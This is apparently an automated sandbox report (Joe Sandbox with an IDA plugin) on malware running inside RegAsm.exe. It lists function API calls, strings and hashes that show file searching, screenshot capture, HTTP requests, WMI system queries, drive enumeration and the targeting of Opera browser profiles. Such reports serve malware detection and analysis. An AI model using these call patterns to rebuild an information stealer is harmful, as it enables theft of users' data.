__aulldiv.LIBCMT ref: 6C013883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C013902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C013918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C01394C

Strings

GTC, xrefs: 6C013912
MOZ_TIMESTAMP_MODE, xrefs: 6C0135DB
GenuntelineI, xrefs: 6C013639
QPC, xrefs: 6C0138FC
AuthcAMDenti, xrefs: 6C013946

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 9777bfa40ea77789680aa44c54bb4363271d25979bb7883e0c35a81241b16463
Instruction ID: 0f52390389fff2202f533a42faf7ed24c62d5352c2bb4f9d46a3ac5ba5200910
Opcode Fuzzy Hash: 9777bfa40ea77789680aa44c54bb4363271d25979bb7883e0c35a81241b16463
Instruction Fuzzy Hash: 4DB190B1B093109BDB08DF68C84471ABBFDBB8E714F05992EF999D3790DB3099048B81

Function 00415FD1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416018
FindFirstFileA.KERNEL32(?,?), ref: 0041602F
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
wsprintfA.USER32 ref: 00416091
StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
wsprintfA.USER32 ref: 004160C2
wsprintfA.USER32 ref: 004160D9
PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
lstrcatA.KERNEL32(?), ref: 00416125
lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
lstrcatA.KERNEL32(?,?), ref: 0041614A
lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
lstrcatA.KERNEL32(?,?), ref: 00416170
FindNextFileA.KERNEL32(?,?), ref: 004162FF
FindClose.KERNEL32(?), ref: 00416313

Strings

%s\%s, xrefs: 004160D3
%s\*, xrefs: 0041600C
%s\%s, xrefs: 0041608B

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

InstallDate, xrefs: 004118ED
Select * From Win32_OperatingSystem, xrefs: 00411895
%d/%d/%d %d:%d:%d, xrefs: 00411943
Unknown, xrefs: 0041196A
Unknown, xrefs: 00411971
Unknown, xrefs: 00411985
WQL, xrefs: 0041189A
ROOT\CIMV2, xrefs: 00411862

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28

Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

ERROR, xrefs: 00406AB6
GET, xrefs: 00406A42
ERROR, xrefs: 00406BAB

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61

Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041546A
FindFirstFileA.KERNEL32(?,?), ref: 00415481
StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
lstrcatA.KERNEL32(?), ref: 0041550D
lstrcatA.KERNEL32(?), ref: 00415520
lstrcatA.KERNEL32(?,?), ref: 00415534
lstrcatA.KERNEL32(?,?), ref: 00415547
lstrcatA.KERNEL32(?,00436A88), ref: 00415559
lstrcatA.KERNEL32(?,?), ref: 0041556D

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 00415623
FindClose.KERNEL32(?), ref: 00415637

Strings

%s\%s, xrefs: 0041545E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

Opera Crypto, xrefs: 0040C09F
\*.*, xrefs: 0040BF73
Opera GX, xrefs: 0040C091
Opera, xrefs: 0040C083

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88

Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE
lstrcpyA.KERNEL32(?,?), ref: 0041520E
lstrcpyA.KERNEL32(?,?), ref: 00415229

Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
lstrlenA.KERNEL32(?), ref: 004152C4

Strings

*%DRIVE_FIXED%*, xrefs: 0041515E
%DRIVE_FIXED%, xrefs: 00415230
*%DRIVE_REMOVABLE%*, xrefs: 0041518F
%DRIVE_REMOVABLE%, xrefs: 00415215

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59

Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

